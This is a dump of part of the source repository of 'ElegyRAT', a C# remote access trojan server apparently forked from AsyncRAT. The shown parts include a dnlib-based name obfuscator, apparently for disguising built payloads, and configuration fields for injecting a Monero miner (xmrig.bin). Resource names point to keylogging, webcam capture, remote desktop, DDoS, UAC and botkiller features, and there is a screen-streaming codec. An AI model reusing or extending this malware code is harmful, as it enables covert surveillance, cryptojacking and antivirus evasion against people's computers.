/ElegyRAT-C-Sharp/Server/RenamingObfuscation/Classes/Utils.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Security.Cryptography;
4 | using System.Text;
5 |
6 | namespace Server.RenamingObfuscation.Classes
7 | {
8 | public static class Utils
9 | {
10 | public static string GenerateRandomString()
11 | {
12 | var sb = new StringBuilder();
13 | for (int i = 1; i <= random.Next(10,20); i++)
14 | {
15 | var randomCharacterPosition = random.Next(0, alphabet.Length);
16 | sb.Append(alphabet[randomCharacterPosition]);
17 | }
18 | return sb.ToString();
19 | }
20 |
21 | private static readonly Random random = new Random();
22 | const string alphabet = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM";
23 |
24 | }
25 | }
26 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/RenamingObfuscation/Interfaces/ICrypto.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 |
7 | namespace Server.RenamingObfuscation.Interfaces
8 | {
9 | public interface ICrypto
10 | {
11 | string Encrypt(string dataPlain);
12 | }
13 | }
14 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/RenamingObfuscation/Interfaces/IRenaming.cs:
--------------------------------------------------------------------------------
1 | using dnlib.DotNet;
2 |
3 | namespace Server.RenamingObfuscation.Interfaces
4 | {
5 | public interface IRenaming
6 | {
7 | ModuleDefMD Rename(ModuleDefMD module);
8 | }
9 | }
10 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/RenamingObfuscation/ModuleDefMD.cs:
--------------------------------------------------------------------------------
1 | using Server.RenamingObfuscation.Classes;
2 | using Server.RenamingObfuscation.Interfaces;
3 | using dnlib.DotNet;
4 |
5 | // Credit github.com/srn-g/RenamingObfuscation
6 | // Fxied by nyan cat
7 | namespace Server.RenamingObfuscation
8 | {
9 | public class Renaming
10 | {
11 |
12 | public static ModuleDefMD DoRenaming(ModuleDefMD inPath)
13 | {
14 | ModuleDefMD module = inPath;
15 | return RenamingObfuscation(inPath);
16 | }
17 |
18 | private static ModuleDefMD RenamingObfuscation(ModuleDefMD inModule)
19 | {
20 | ModuleDefMD module = inModule;
21 |
22 | IRenaming rnm = new NamespacesRenaming();
23 |
24 | module = rnm.Rename(module);
25 |
26 | rnm = new ClassesRenaming();
27 |
28 | module = rnm.Rename(module);
29 |
30 | rnm = new MethodsRenaming();
31 |
32 | module = rnm.Rename(module);
33 |
34 | rnm = new PropertiesRenaming();
35 |
36 | module = rnm.Rename(module);
37 |
38 | rnm = new FieldsRenaming();
39 |
40 | module = rnm.Rename(module);
41 |
42 | return module;
43 | }
44 | }
45 | }
46 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/7z.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/7z.dll
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/7z.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/7z.exe
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/Fixer.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | title ElegyRAT - Fixer
3 | echo Use this if ElegyRAT won't open at all
4 | echo YOU NEED TO RUN THIS AS ADMIN
5 |
6 | pause
7 | lodctr /r
8 | pause
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/IconExtractor.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/IconExtractor.dll
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/Miscellaneous.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/Miscellaneous.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/arrow_down.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/arrow_down.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/arrow_up.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/arrow_up.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/blank-screen.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/blank-screen.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/botkiller.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/botkiller.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/builder.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/builder.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/cGeoIp.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/cGeoIp.dll
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/chat.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/chat.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/client.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/client.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/coding.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/coding.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/ddos.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/ddos.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/disabled.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/disabled.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/extra.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/extra.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/filemanager.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/filemanager.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/iconfinder_32_171485 (1).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/iconfinder_32_171485 (1).png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/info.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/info.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/key.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/key.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/keyboard-on.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/keyboard-on.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/keyboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/keyboard.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/logger.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/logger.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/monitoring-system.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/monitoring-system.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/mouse.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/mouse.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/mouse_enable.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/mouse_enable.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/msgbox.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/msgbox.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/netstat.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/netstat.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/pc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/pc.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/play-button.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/play-button.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/process.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/process.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/remotedesktop.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/remotedesktop.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/report.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/report.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/save-image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/save-image.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/save-image2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/save-image2.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/server.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/server.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/settings.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/settings.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/shell.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/stop (1).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/stop (1).png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/system.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/system.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/tomem.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/tomem.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/tomem1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/tomem1.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/u-torrent-logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/u-torrent-logo.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/uac.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/uac.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/usb.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/usb.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/visit.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/visit.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/webcam.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/webcam.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/xmr.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/xmr.png
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Resources/xmrig.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/Resources/xmrig.bin
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/Settings.cs:
--------------------------------------------------------------------------------
1 | using Server.Algorithm;
2 | using Server.Connection;
3 | using System.Collections.Generic;
4 | using System.IO;
5 | using System.Security.Cryptography.X509Certificates;
6 | using System.Windows.Forms;
7 |
8 | namespace Server
9 | {
10 | public static class Settings
11 | {
12 | public static List Blocked = new List();
13 | public static object LockBlocked = new object();
14 |
15 | public static long SentValue { get; set; }
16 | public static long ReceivedValue { get; set; }
17 | public static object LockReceivedSendValue = new object();
18 |
19 |
20 | public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12";
21 | public static X509Certificate2 ServerCertificate;
22 | //public static readonly string Version = "AsyncRAT 0.5.7B";
23 | public static readonly string Version = "ElegyRAT 0.1.6A";
24 | public static object LockListviewClients = new object();
25 | public static object LockListviewLogs = new object();
26 | public static object LockListviewThumb = new object();
27 | public static bool ReportWindow = false;
28 | public static List ReportWindowClients = new List();
29 | public static object LockReportWindowClients = new object();
30 | }
31 |
32 | public static class XmrSettings
33 | {
34 | public static string Pool = "";
35 | public static string Wallet = "";
36 | public static string Pass = "";
37 | public static string InjectTo = "";
38 | public static string Hash = "";
39 | }
40 | }
41 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/StreamLibrary/Enums.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 |
5 | namespace StreamLibrary
6 | {
7 | public enum CodecOption
8 | {
9 | ///
10 | /// The Previous and next image size must be equal
11 | ///
12 | RequireSameSize,
13 | ///
14 | /// If the codec is having a stream buffer
15 | ///
16 | HasBuffers,
17 | ///
18 | /// The image will be disposed by the codec and shall not be disposed by the user
19 | ///
20 | AutoDispose,
21 | /// No codec options were used
22 | None
23 | };
24 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/StreamLibrary/IUnsafeCodec.cs:
--------------------------------------------------------------------------------
1 | using StreamLibrary.src;
2 | using System;
3 | using System.Collections.Generic;
4 | using System.Drawing;
5 | using System.Drawing.Imaging;
6 | using System.IO;
7 | using System.Text;
8 |
9 | namespace StreamLibrary
10 | {
11 | public abstract class IUnsafeCodec
12 | {
13 | protected JpgCompression jpgCompression;
14 | protected LzwCompression lzwCompression;
15 | public abstract ulong CachedSize { get; internal set; }
16 | protected object ImageProcessLock { get; private set; }
17 |
18 | private int _imageQuality;
19 | public int ImageQuality
20 | {
21 | get { return _imageQuality; }
22 | set
23 | {
24 | _imageQuality = value;
25 | jpgCompression = new JpgCompression(value);
26 | lzwCompression = new LzwCompression(value);
27 | }
28 | }
29 |
30 |
31 | public abstract event IVideoCodec.VideoDebugScanningDelegate onCodeDebugScan;
32 | public abstract event IVideoCodec.VideoDebugScanningDelegate onDecodeDebugScan;
33 |
34 | public IUnsafeCodec(int ImageQuality = 100)
35 | {
36 | this.ImageQuality = ImageQuality;
37 | this.ImageProcessLock = new object();
38 | }
39 |
40 | public abstract int BufferCount { get; }
41 | public abstract CodecOption CodecOptions { get; }
42 | public abstract unsafe void CodeImage(IntPtr Scan0, Rectangle ScanArea, Size ImageSize, PixelFormat Format, Stream outStream);
43 | public abstract unsafe Bitmap DecodeData(Stream inStream);
44 | public abstract unsafe Bitmap DecodeData(IntPtr CodecBuffer, uint Length);
45 | }
46 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/StreamLibrary/IVideoCodec.cs:
--------------------------------------------------------------------------------
1 | using StreamLibrary.src;
2 | using System;
3 | using System.Collections.Generic;
4 | using System.Drawing;
5 | using System.IO;
6 | using System.Text;
7 |
8 | namespace StreamLibrary
9 | {
10 | public abstract class IVideoCodec
11 | {
12 | public delegate void VideoCodeProgress(Stream stream, Rectangle[] MotionChanges);
13 | public delegate void VideoDecodeProgress(Bitmap bitmap);
14 | public delegate void VideoDebugScanningDelegate(Rectangle ScanArea);
15 |
16 | public abstract event VideoCodeProgress onVideoStreamCoding;
17 | public abstract event VideoDecodeProgress onVideoStreamDecoding;
18 | public abstract event VideoDebugScanningDelegate onCodeDebugScan;
19 | public abstract event VideoDebugScanningDelegate onDecodeDebugScan;
20 | protected JpgCompression jpgCompression;
21 | public abstract ulong CachedSize { get; internal set; }
22 | public int ImageQuality { get; set; }
23 |
24 | public IVideoCodec(int ImageQuality = 100)
25 | {
26 | this.jpgCompression = new JpgCompression(ImageQuality);
27 | this.ImageQuality = ImageQuality;
28 | }
29 |
30 | public abstract int BufferCount { get; }
31 | public abstract CodecOption CodecOptions { get; }
32 | public abstract void CodeImage(Bitmap bitmap, Stream outStream);
33 | public abstract Bitmap DecodeData(Stream inStream);
34 | }
35 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/StreamLibrary/src/JpgCompression.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Drawing;
4 | using System.Drawing.Imaging;
5 | using System.IO;
6 | using System.Text;
7 |
8 | namespace StreamLibrary.src
9 | {
10 | public class JpgCompression
11 | {
12 | private EncoderParameter parameter;
13 | private ImageCodecInfo encoderInfo;
14 | private EncoderParameters encoderParams;
15 |
16 | public JpgCompression(int Quality)
17 | {
18 | this.parameter = new EncoderParameter(System.Drawing.Imaging.Encoder.Quality, (long)Quality);
19 | this.encoderInfo = GetEncoderInfo("image/jpeg");
20 | this.encoderParams = new EncoderParameters(2);
21 | this.encoderParams.Param[0] = parameter;
22 | this.encoderParams.Param[1] = new EncoderParameter(System.Drawing.Imaging.Encoder.Compression, (long)2);
23 | }
24 |
25 | public byte[] Compress(Bitmap bmp)
26 | {
27 | using (MemoryStream stream = new MemoryStream())
28 | {
29 | bmp.Save(stream, encoderInfo, encoderParams);
30 | return stream.ToArray();
31 | }
32 | }
33 | public void Compress(Bitmap bmp, ref Stream TargetStream)
34 | {
35 | bmp.Save(TargetStream, encoderInfo, encoderParams);
36 | }
37 |
38 | private ImageCodecInfo GetEncoderInfo(string mimeType)
39 | {
40 | ImageCodecInfo[] imageEncoders = ImageCodecInfo.GetImageEncoders();
41 | int num2 = imageEncoders.Length - 1;
42 | for (int i = 0; i <= num2; i++)
43 | {
44 | if (imageEncoders[i].MimeType == mimeType)
45 | {
46 | return imageEncoders[i];
47 | }
48 | }
49 | return null;
50 | }
51 | }
52 | }
53 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/StreamLibrary/src/LzwCompression.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Drawing;
4 | using System.Drawing.Imaging;
5 | using System.IO;
6 | using System.Text;
7 |
8 | namespace StreamLibrary.src
9 | {
10 | public class LzwCompression
11 | {
12 | private EncoderParameter parameter;
13 | private ImageCodecInfo encoderInfo;
14 | private EncoderParameters encoderParams;
15 |
16 | public LzwCompression(int Quality)
17 | {
18 | this.parameter = new EncoderParameter(System.Drawing.Imaging.Encoder.Quality, (long)Quality);
19 | this.encoderInfo = GetEncoderInfo("image/jpeg");
20 | this.encoderParams = new EncoderParameters(2);
21 | this.encoderParams.Param[0] = parameter;
22 | this.encoderParams.Param[1] = new EncoderParameter(System.Drawing.Imaging.Encoder.Compression, (long)EncoderValue.CompressionLZW);
23 | }
24 |
25 | public byte[] Compress(Bitmap bmp, byte[] AdditionInfo = null)
26 | {
27 | using (MemoryStream stream = new MemoryStream())
28 | {
29 | if (AdditionInfo != null)
30 | stream.Write(AdditionInfo, 0, AdditionInfo.Length);
31 | bmp.Save(stream, encoderInfo, encoderParams);
32 | return stream.ToArray();
33 | }
34 | }
35 | public void Compress(Bitmap bmp, Stream stream, byte[] AdditionInfo = null)
36 | {
37 | if (AdditionInfo != null)
38 | stream.Write(AdditionInfo, 0, AdditionInfo.Length);
39 | bmp.Save(stream, encoderInfo, encoderParams);
40 | }
41 |
42 | private ImageCodecInfo GetEncoderInfo(string mimeType)
43 | {
44 | ImageCodecInfo[] imageEncoders = ImageCodecInfo.GetImageEncoders();
45 | for (int i = 0; i < imageEncoders.Length; i++)
46 | {
47 | if (imageEncoders[i].MimeType == mimeType)
48 | {
49 | return imageEncoders[i];
50 | }
51 | }
52 | return null;
53 | }
54 | }
55 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/StreamLibrary/src/NativeMethods.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Runtime.InteropServices;
4 | using System.Text;
5 |
6 | namespace StreamLibrary.src
7 | {
8 | public class NativeMethods
9 | {
10 | [DllImport("msvcrt.dll", CallingConvention = CallingConvention.Cdecl)]
11 | public static extern unsafe int memcmp(byte* ptr1, byte* ptr2, uint count);
12 |
13 | [DllImport("msvcrt.dll", CallingConvention = CallingConvention.Cdecl)]
14 | public static extern int memcmp(IntPtr ptr1, IntPtr ptr2, uint count);
15 |
16 | [DllImport("msvcrt.dll", CallingConvention = CallingConvention.Cdecl)]
17 | public static extern int memcpy(IntPtr dst, IntPtr src, uint count);
18 |
19 | [DllImport("msvcrt.dll", CallingConvention = CallingConvention.Cdecl)]
20 | public static extern unsafe int memcpy(void* dst, void* src, uint count);
21 | }
22 | }
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/elegy_icon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/Server/elegy_icon.ico
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/Server/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/ElegyRAT-C-Sharp/clear.bat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/ElegyRAT-C-Sharp/clear.bat
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2020 Weiho
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/Start.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we1h0/ElegyRAT-C-Sharp/64200cb5ccce07e9945f5139ba80db577b8a0c8b/Start.png
--------------------------------------------------------------------------------